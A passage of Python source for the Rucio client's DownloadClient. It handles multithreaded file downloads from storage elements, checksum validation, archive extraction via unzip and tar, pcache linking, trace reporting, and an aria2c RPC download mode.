# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Martin Barisits <martin.barisits@cern.ch>, 2018-2021
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - David Cameron <david.cameron@cern.ch>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import division
import copy
import itertools
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.config import config_get
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.didtype import DIDType
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, detect_client_location, generate_uuid, parse_replicas_from_string, \
send_trace, sizefmt, execute, parse_replicas_from_file, extract_scope
from rucio.common.utils import GLOBALLY_SUPPORTED_CHECKSUMS, CHECKSUM_ALGO_DICT, PREFERRED_CHECKSUM
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger=logging.log):
"""
Initialises a extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
:param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: optional decorated logging.log object that can be passed from the calling daemon or client.
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
self.is_useable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
if self.is_useable_result is not None:
return self.is_useable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger(logging.DEBUG, '"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
self.logger(logging.DEBUG, 'Failed to execute: "%s"' % cmd)
self.logger(logging.DEBUG, error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
Initialises the basic settings for an DownloadClient object
:param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
:param external_traces: Optional: reference to a list where traces can be added
:param logger: Optional: logging.Logger object. If None, default logger will be used.
"""
self.check_pcache = check_pcache
if not logger:
self.logger = logging.log
else:
self.logger = logger.log
self.tracing = tracing
if not self.tracing:
logger(logging.DEBUG, 'Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
# if token should be used, use only JWT tokens
self.auth_token = self.client.auth_token if len(self.client.auth_token.split(".")) == 3 else None
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger(logging.DEBUG, 'Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
if self.client.vo != 'def':
self.trace_tpl['vo'] = self.client.vo
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger=self.logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger=self.logger))
self.extract_scope_convention = config_get('common', 'extract_scope', False, None)
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
adler32 - Optional: The adler32 checmsum to compare the downloaded files adler32 checksum with
md5 - Optional: The md5 checksum to compare the downloaded files md5 checksum with
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
item['input_dids'] = {DIDType(did_str): {}}
if not did_str or not pfn or not rse:
logger(logging.DEBUG, item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger(logging.DEBUG, 'Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger(logging.DEBUG, did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'), did_scope, item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
did_path_name = did_name
if did_name.startswith('/'):
did_path_name = did_name[1:]
dest_file_path = os.path.join(dest_dir_path, did_path_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options['ignore_checksum'] = 'adler32' not in item and 'md5' not in item
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
impl - Optional: name of the protocol implementation to be used to download this item.
no_resolve_archives - Optional: bool indicating whether archives should not be considered for download (Default: False)
resolve_archives - Deprecated: Use no_resolve_archives instead
force_scheme - Optional: force a specific scheme to download this item. (Default: None)
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
transfer_speed_timeout - Optional: Minimum allowed transfer speed (in KBps). Ignored if transfer_timeout set. Otherwise, used to compute default timeout (Default: 500)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items))
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def download_from_metalink_file(self, item, metalink_file_path, num_threads=2, trace_custom_fields={}, traces_copy_out=None, deactivate_file_download_exceptions=False):
"""
Download items using a given metalink file.
:param item: dictionary describing an item to download. Keys:
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces.
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
logger(logging.INFO, 'Getting sources from metalink file')
metalinks = parse_replicas_from_file(metalink_file_path)
trace_custom_fields['uuid'] = generate_uuid()
did_to_options = {}
for metalink in metalinks:
did = DIDType(metalink['did'])
did_to_options[did] = [item]
metalink['input_dids'] = {did: {}}
input_items = self._prepare_items_for_download(did_to_options, metalinks)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if not deactivate_file_download_exceptions and num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _download_multithreaded(self, input_items, num_threads, trace_custom_fields={}, traces_copy_out=None):
"""
Starts an appropriate number of threads to download items from the input list.
(This function is meant to be used as class internal only)
:param input_items: list containing the input items to download
:param num_threads: suggestion of how many threads should be started
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: list with output items as dictionaries
"""
logger = self.logger
num_files = len(input_items)
nlimit = 5
num_threads = max(1, num_threads)
num_threads = min(num_files, num_threads, nlimit)
input_queue = Queue()
output_queue = Queue()
input_queue.queue = deque(input_items)
if num_threads < 2:
logger(logging.INFO, 'Using main thread to download %d file(s)' % num_files)
self._download_worker(input_queue, output_queue, trace_custom_fields, traces_copy_out, '')
return list(output_queue.queue)
logger(logging.INFO, 'Using %d threads to download %d files' % (num_threads, num_files))
threads = []
for thread_num in range(0, num_threads):
log_prefix = 'Thread %s/%s: ' % (thread_num, num_threads)
kwargs = {'input_queue': input_queue,
'output_queue': output_queue,
'trace_custom_fields': trace_custom_fields,
'traces_copy_out': traces_copy_out,
'log_prefix': log_prefix}
try:
thread = Thread(target=self._download_worker, kwargs=kwargs)
thread.start()
threads.append(thread)
except Exception as error:
logger(logging.WARNING, 'Failed to start thread %d' % thread_num)
logger(logging.DEBUG, error)
try:
logger(logging.DEBUG, 'Waiting for threads to finish')
for thread in threads:
thread.join()
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
for thread in threads:
thread.kill_received = True
return list(output_queue.queue)
def _download_worker(self, input_queue, output_queue, trace_custom_fields, traces_copy_out, log_prefix):
"""
This function runs as long as there are items in the input queue,
downloads them and stores the output in the output queue.
(This function is meant to be used as class internal only)
:param input_queue: queue containing the input items to download
:param output_queue: queue where the output items will be stored
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
"""
logger = self.logger
logger(logging.DEBUG, '%sStart processing queued downloads' % log_prefix)
while True:
try:
item = input_queue.get_nowait()
except Empty:
break
try:
trace = copy.deepcopy(self.trace_tpl)
trace.update(trace_custom_fields)
download_result = self._download_item(item, trace, traces_copy_out, log_prefix)
output_queue.put(download_result)
except KeyboardInterrupt:
logger(logging.WARNING, 'You pressed Ctrl+C! Exiting gracefully')
os.kill(os.getpgid(), signal.SIGINT)
break
except Exception as error:
logger(logging.ERROR, '%sFailed to download item' % log_prefix)
logger(logging.DEBUG, error)
@staticmethod
def _compute_actual_transfer_timeout(item):
"""
Merge the two options related to timeout into the value which will be used for protocol download.
:param item: dictionary that describes the item to download
:return: timeout in seconds
"""
default_transfer_timeout = 360
default_transfer_speed_timeout = 500 # KBps
# Static additive increment of the speed timeout. To include the static cost of
# establishing connections and download of small files
transfer_speed_timeout_static_increment = 60
transfer_timeout = item.get('merged_options', {}).get('transfer_timeout')
if transfer_timeout is not None:
return transfer_timeout
transfer_speed_timeout = item.get('merged_options', {}).get('transfer_speed_timeout')
bytes_ = item.get('bytes')
if not bytes_ or transfer_speed_timeout is None:
return default_transfer_timeout
if not transfer_speed_timeout > 0:
transfer_speed_timeout = default_transfer_speed_timeout
# Convert from KBytes/s to bytes/s
transfer_speed_timeout = transfer_speed_timeout * 1000
timeout = bytes_ // transfer_speed_timeout + transfer_speed_timeout_static_increment
return timeout
def _download_item(self, item, trace, traces_copy_out, log_prefix=''):
"""
Downloads the given item and sends traces for success/failure.
(This function is meant to be used as class internal only)
:param item: dictionary that describes the item to download
:param trace: dictionary representing a pattern of trace that will be send
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:param log_prefix: string that will be put at the beginning of every log message
:returns: dictionary with all attributes from the input item and a clientState attribute
"""
logger = self.logger
pcache = Pcache() if self.check_pcache and len(item.get('archive_items', [])) == 0 else None
did_scope = item['scope']
did_name = item['name']
did_str = '%s:%s' % (did_scope, did_name)
logger(logging.INFO, '%sPreparing download of %s' % (log_prefix, did_str))
trace['scope'] = did_scope
trace['filename'] = did_name
trace.setdefault('datasetScope', item.get('dataset_scope', ''))
trace.setdefault('dataset', item.get('dataset_name', ''))
trace.setdefault('filesize', item.get('bytes'))
trace.setdefault('clientState', 'PROCESSING')
trace.setdefault('stateReason', 'UNKNOWN')
dest_file_paths = item['dest_file_paths']
# appending trace to list reference, if the reference exists
if traces_copy_out is not None:
traces_copy_out.append(trace)
# if file already exists make sure it exists at all destination paths, set state, send trace, and return
for dest_file_path in dest_file_paths:
if os.path.isfile(dest_file_path):
if item.get('merged_options', {}).get('check_local_with_filesize_only', False):
local_filesize = os.stat(dest_file_path).st_size
if item.get('bytes') != local_filesize:
logger(logging.INFO, '%sFile with same name exists locally, but filesize mismatches: %s' % (log_prefix, did_str))
logger(logging.DEBUG, '%slocal filesize: %d bytes, expected filesize: %d bytes' % (log_prefix, local_filesize, item.get('bytes')))
continue
elif not item.get('merged_options', {}).get('ignore_checksum', False):
verified, _, _ = _verify_checksum(item, dest_file_path)
if not verified:
logger(logging.INFO, '%sFile with same name exists locally, but checksum mismatches: %s' % (log_prefix, did_str))
continue
logger(logging.INFO, '%sFile exists already locally: %s' % (log_prefix, did_str))
for missing_file_path in dest_file_paths:
if not os.path.isfile(missing_file_path):
logger(logging.DEBUG, "copying '%s' to '%s'" % (dest_file_path, missing_file_path))
shutil.copy2(dest_file_path, missing_file_path)
item['clientState'] = 'ALREADY_DONE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'ALREADY_DONE'
send_trace(trace, self.client.host, self.client.user_agent)
return item
# check if file has replicas
sources = item.get('sources')
if not sources or not len(sources):
logger(logging.WARNING, '%sNo available source found for file: %s' % (log_prefix, did_str))
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
trace['stateReason'] = 'No available sources'
self._send_trace(trace)
return item
# checking Pcache
storage_prefix = None
if pcache:
# to check only first replica is enough
pfn = sources[0]['pfn']
rse_name = sources[0]['rse']
# protocols are needed to extract deterministic part of the pfn
scheme = None
prots = self.client.get_protocols(rse_name)
for prot in prots:
if prot['scheme'] in pfn and prot['prefix'] in pfn:
scheme = prot['scheme']
storage_prefix = prot['prefix']
# proceed with the actual check
logger(logging.INFO, 'Checking whether %s is in pcache' % dest_file_path)
pcache_state = None
hardlink_state = None
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, dst=dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Pcache failure: %s' % str(e))
# if file found in pcache, send trace and return
if pcache_state == 0 and hardlink_state == 1:
logger(logging.INFO, 'File found in pcache.')
item['clientState'] = 'FOUND_IN_PCACHE'
trace['transferStart'] = time.time()
trace['transferEnd'] = time.time()
trace['clientState'] = 'FOUND_IN_PCACHE'
self._send_trace(trace)
return item
else:
logger(logging.INFO, 'File not found in pcache.')
# try different PFNs until one succeeded
temp_file_path = item['temp_file_path']
success = False
i = 0
while not success and i < len(sources):
source = sources[i]
i += 1
pfn = source['pfn']
rse_name = source['rse']
scheme = pfn.split(':')[0]
try:
rse = rsemgr.get_rse_info(rse_name, vo=self.client.vo)
except RucioException as error:
logger(logging.WARNING, '%sCould not get info of RSE %s: %s' % (log_prefix, rse_name, error))
trace['stateReason'] = str(error)
continue
trace['remoteSite'] = rse_name
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
trace['protocol'] = scheme
transfer_timeout = self._compute_actual_transfer_timeout(item)
timeout_log_string = ""
if transfer_timeout:
timeout_log_string = " and timeout of %ds" % transfer_timeout
logger(logging.INFO, '%sTrying to download with %s%s from %s: %s ' % (log_prefix, scheme, timeout_log_string, rse_name, did_str))
impl = item.get('impl')
if impl:
logger(logging.INFO, '%sUsing Implementation (impl): %s ' % (log_prefix, impl))
try:
protocol = rsemgr.create_protocol(rse, operation='read', scheme=scheme, impl=impl, auth_token=self.auth_token, logger=logger)
protocol.connect()
except Exception as error:
logger(logging.WARNING, '%sFailed to create protocol for PFN: %s' % (log_prefix, pfn))
logger(logging.DEBUG, 'scheme: %s, exception: %s' % (scheme, error))
trace['stateReason'] = str(error)
continue
logger(logging.INFO, '%sUsing PFN: %s' % (log_prefix, pfn))
attempt = 0
retries = 2
# do some retries with the same PFN if the download fails
while not success and attempt < retries:
attempt += 1
item['attemptnr'] = attempt
if os.path.isfile(temp_file_path):
logger(logging.DEBUG, '%sDeleting existing temporary file: %s' % (log_prefix, temp_file_path))
os.unlink(temp_file_path)
start_time = time.time()
try:
protocol.get(pfn, temp_file_path, transfer_timeout=transfer_timeout)
success = True
except Exception as error:
logger(logging.DEBUG, error)
trace['clientState'] = str(type(error).__name__)
trace['stateReason'] = str(error)
end_time = time.time()
if success and not item.get('merged_options', {}).get('ignore_checksum', False):
verified, rucio_checksum, local_checksum = _verify_checksum(item, temp_file_path)
if not verified:
success = False
os.unlink(temp_file_path)
logger(logging.WARNING, '%sChecksum validation failed for file: %s' % (log_prefix, did_str))
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
trace['clientState'] = 'FAIL_VALIDATE'
trace['stateReason'] = 'Checksum validation failed: Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum)
if not success:
logger(logging.WARNING, '%sDownload attempt failed. Try %s/%s' % (log_prefix, attempt, retries))
self._send_trace(trace)
protocol.close()
if not success:
logger(logging.ERROR, '%sFailed to download file %s' % (log_prefix, did_str))
item['clientState'] = 'FAILED'
return item
dest_file_path_iter = iter(dest_file_paths)
first_dest_file_path = next(dest_file_path_iter)
logger(logging.DEBUG, "renaming '%s' to '%s'" % (temp_file_path, first_dest_file_path))
os.rename(temp_file_path, first_dest_file_path)
# if the file was downloaded with success, it can be linked to pcache
if pcache:
logger(logging.INFO, 'File %s is going to be registerred into pcache.' % dest_file_path)
try:
pcache_state, hardlink_state = pcache.check_and_link(src=pfn, storage_root=storage_prefix, local_src=first_dest_file_path)
logger(logging.INFO, 'File %s is now registerred into pcache.' % first_dest_file_path)
except Exception as e:
logger(logging.WARNING, 'Failed to load file to pcache: %s' % str(e))
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
trace['clientState'] = 'DONE'
trace['stateReason'] = 'OK'
item['clientState'] = 'DONE'
self._send_trace(trace)
duration = round(end_time - start_time, 2)
size = item.get('bytes')
size_str = sizefmt(size, self.is_human_readable)
if size and duration:
rate = round((size / duration) * 1e-6, 2)
logger(logging.INFO, '%sFile %s successfully downloaded. %s in %s seconds = %s MBps' % (log_prefix, did_str, size_str, duration, rate))
else:
logger(logging.INFO, '%sFile %s successfully downloaded in %s seconds' % (log_prefix, did_str, duration))
file_items_in_archive = item.get('archive_items', [])
if len(file_items_in_archive) > 0:
logger(logging.INFO, '%sExtracting %d file(s) from %s' % (log_prefix, len(file_items_in_archive), did_name))
archive_file_path = first_dest_file_path
for file_item in file_items_in_archive:
extraction_ok = False
extract_file_name = file_item['name']
dest_file_path_iter = iter(file_item['dest_file_paths'])
first_dest_file_path = next(dest_file_path_iter)
dest_dir = os.path.dirname(first_dest_file_path)
logger(logging.DEBUG, '%sExtracting %s to %s' % (log_prefix, extract_file_name, dest_dir))
for extraction_tool in self.extraction_tools:
if extraction_tool.try_extraction(archive_file_path, extract_file_name, dest_dir):
extraction_ok = True
break
if not extraction_ok:
logger(logging.ERROR, 'Extraction of file %s from archive %s failed.' % (extract_file_name, did_name))
continue
first_dest_file_path = os.path.join(dest_dir, extract_file_name)
for cur_dest_file_path in dest_file_path_iter:
logger(logging.DEBUG, "copying '%s' to '%s'" % (first_dest_file_path, cur_dest_file_path))
shutil.copy2(first_dest_file_path, cur_dest_file_path)
if not item.get('shall_keep_archive'):
logger(logging.DEBUG, '%sDeleting archive %s' % (log_prefix, did_name))
os.remove(archive_file_path)
return item
def download_aria2c(self, items, trace_custom_fields={}, filters={}, deactivate_file_download_exceptions=False):
"""
Uses aria2c to download the items with given DIDs. This function can also download datasets and wildcarded DIDs.
It only can download files that are available via https/davs.
Aria2c needs to be installed and X509_USER_PROXY needs to be set!
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - Optional: rse name (e.g. 'CERN-PROD_DATADISK') or rse expression from where to download
base_dir - Optional: base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir. (Default: False)
nrandom - Optional: if the DID addresses a dataset, nrandom files will be randomly choosen for download from the dataset
ignore_checksum - Optional: If true, skips the checksum validation between the downloaded file and the rucio catalouge. (Default: False)
check_local_with_filesize_only - Optional: If true, already downloaded files will not be validated by checksum.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param filters: dictionary containing filter options
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something went wrong during the download (e.g. aria2c could not be started)
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
rpc_secret = '%x' % (random.getrandbits(64))
rpc_auth = 'token:%s' % rpc_secret
rpcproc, aria_rpc = self._start_aria2c_rpc(rpc_secret)
for item in items:
item['force_scheme'] = ['https', 'davs']
item['no_resolve_archives'] = True
logger(logging.INFO, 'Processing %d item(s) for input' % len(items))
did_to_input_items, file_items_with_sources = self._resolve_and_merge_input_items(copy.deepcopy(items))
self.logger(logging.DEBUG, 'num_unmerged_items=%d; num_dids=%d; num_file_items=%d' % (len(items), len(did_to_input_items), len(file_items_with_sources)))
input_items = self._prepare_items_for_download(did_to_input_items, file_items_with_sources)
try:
output_items = self._download_items_aria2c(input_items, aria_rpc, rpc_auth, trace_custom_fields)
except Exception as error:
self.logger(logging.ERROR, 'Unknown exception during aria2c download')
self.logger(logging.DEBUG, error)
finally:
try:
aria_rpc.aria2.forceShutdown(rpc_auth)
finally:
rpcproc.terminate()
return self._check_output(output_items, deactivate_file_download_exceptions=deactivate_file_download_exceptions)
def _start_aria2c_rpc(self, rpc_secret):
"""
Starts aria2c in RPC mode as a subprocess. Also creates
the RPC proxy instance.
(This function is meant to be used as class internal only)
:param rpc_secret: the secret for the RPC proxy
:returns: a tupel with the process and the rpc proxy objects
:raises RucioException: if the process or the proxy could not be created
"""
logger = self.logger
try:
from xmlrpclib import ServerProxy as RPCServerProxy # py2
except ImportError:
from xmlrpc.client import ServerProxy as RPCServerProxy
cmd = 'aria2c '\
'--enable-rpc '\
'--certificate=$X509_USER_PROXY '\
'--private-key=$X509_USER_PROXY '\
'--ca-certificate=/etc/pki/tls/certs/CERN-bundle.pem '\
'--quiet=true '\
'--allow-overwrite=true '\
'--auto-file-renaming=false '\
'--stop-with-process=%d '\
'--rpc-secret=%s '\
'--rpc-listen-all=false '\
'--rpc-max-request-size=100M '\
'--connect-timeout=5 '\
'--rpc-listen-port=%d'
logger(logging.INFO, 'Starting aria2c rpc server...')
# trying up to 3 random ports
for attempt in range(3):
port = random.randint(1024, 65534)
logger(logging.DEBUG, 'Trying to start rpc server on port: %d' % port)
try:
to_exec = cmd % (os.getpid(), rpc_secret, port)
logger(logging.DEBUG, to_exec)
rpcproc = execute(to_exec, False)
except Exception as error:
raise RucioException('Failed to execute aria2c!', error)
# if port is in use aria should fail to start so give it some time
time.sleep(2)
# did it fail?
if rpcproc.poll() is not None:
(out, err) = rpcproc.communicate()
logger(logging.DEBUG, 'Failed to start aria2c with port: %d' % port)
logger(logging.DEBUG, 'aria2c output: %s' % out)
else:
break
if rpcproc.poll() is not None:
raise RucioException('Failed to start aria2c rpc server!')
try:
aria_rpc = RPCServerProxy('http://localhost:%d/rpc' % port)
except Exception as error:
rpcproc.kill()
raise RucioException('Failed to initialise rpc proxy!', error)
return (rpcproc, aria_rpc)
def _download_items_aria2c(self, items, aria_rpc, rpc_auth, trace_custom_fields={}):
"""
Uses aria2c to download the given items. Aria2c needs to be started
as RPC background process first and a RPC proxy is needed.
(This function is meant to be used as class internal only)
:param items: list of dictionaries containing one dict for each file to download
:param aria_rcp: RPCProxy to the aria2c process
:param rpc_auth: the rpc authentication token
:param trace_custom_fields: Custom key value pairs to send with the traces
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
"""
logger = self.logger
gid_to_item = {} # maps an aria2c download id (gid) to the download item
pfn_to_rse = {}
items_to_queue = [item for item in items]
# items get removed from gid_to_item when they are complete or failed
while len(gid_to_item) or len(items_to_queue):
num_queued = 0
# queue up to 100 files and then check arias status
while (num_queued < 100) and len(items_to_queue):
item = items_to_queue.pop()
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
trace = {'scope': file_scope,
'filename': file_name,
'datasetScope': item.get('dataset_scope', ''),
